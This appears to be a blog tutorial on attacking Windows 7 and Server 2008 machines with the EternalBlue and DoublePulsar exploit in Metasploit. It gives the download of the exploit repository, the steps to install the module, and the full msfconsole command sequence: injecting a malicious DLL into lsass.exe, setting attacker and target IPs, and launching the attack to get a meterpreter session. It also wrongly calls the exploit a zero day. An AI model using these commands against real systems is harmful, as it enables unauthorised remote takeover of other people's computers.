Exploit Remote Windows PC with Eternalblue & Doublepulsar Exploit in Metasploit

Through this article we are sharing recent zero day exploit which requires metasploit framework to shoot any other windows based system. This exploit is combination of two tools “Eternal Blue” which is use as backdooring in windows and “Doublepulsar” which is used for injecting dll file with the help of payload. So we will manually add this exploit in metasploit framework and step up for attacking window server 2008.

Attacker: kali Linux

Target: window 7 and window server 2008

Let’s Start!

Open the terminal in Kali Linux and type following command to download this exploit from git hub.

Git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Once the required exploit will get downloaded then open the folder and copy Eternal Blue- Doublepulsar .rb ruby file so that we can add this exploit inside metasploit.

Now past the copied ruby file inside given path Usr/share/metasploit Framework /module/exploits/windows/smb which will add this exploit inside metasploit framework.

Then load metasploit framework to start and type following for testing zero day exploit

Msfconsole

This module exploits vulnerability on SMBv1 and SMBv2 protocols through eternalblue. After that doublepulsar is used to inject remotely a malicious dll.

Use windows/smb/eternalblue_doublepulsar

Msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps

Msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps

Msf exploit (eternalblue_doublepulsar)>set targetarchitecture x64

Msf exploit (eternalblue_doublepulsar)>set processinject lsass.exe

Msf exploit (eternalblue_doublepulsar)>set lhost 192.168.1.6

Msf exploit (eternalblue_doublepulsar)>set rhost 192.168.1.104

Msf exploit (eternalblue_doublepulsar)>exploit

Hence from screenshot you can observer only we need to set target’s architecture and IP before launching exploit and then when all information is set then launch your attack which will give you meterpreter session successfully like I have owned.